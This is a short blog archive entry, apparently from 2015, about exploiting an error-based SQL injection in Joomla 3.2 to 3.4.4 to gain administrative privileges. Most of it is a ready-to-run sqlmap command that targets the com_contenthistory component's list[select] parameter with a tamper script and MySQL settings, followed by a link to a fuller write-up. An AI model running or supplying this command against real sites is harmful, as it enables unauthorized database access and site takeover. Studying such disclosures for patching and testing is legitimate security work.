Author Archives: sandeep venkatesan

Joomla 3.2 – 3.4.4 (Exploiting Sql Injection to gain administrative privileges)

October 24th, 2015 📆 | 3280 Views ⚑

http://whwriteups.blogspot.in/2015/10/joomla-32-344-sql-injection-leads-to.html Error Based Sql Injection via sqlmap option=com_contenthistory&view=history SQLMAP COMMAND: sqlmap -u “http://affected url]/index.php?option=com_contenthistory&view=history&listordering]=&item_id=1&listselect]=” –threads=10 –dbms=MYSQL –tamper=apostrophemask –technique=E -D joomlab

Tagged with: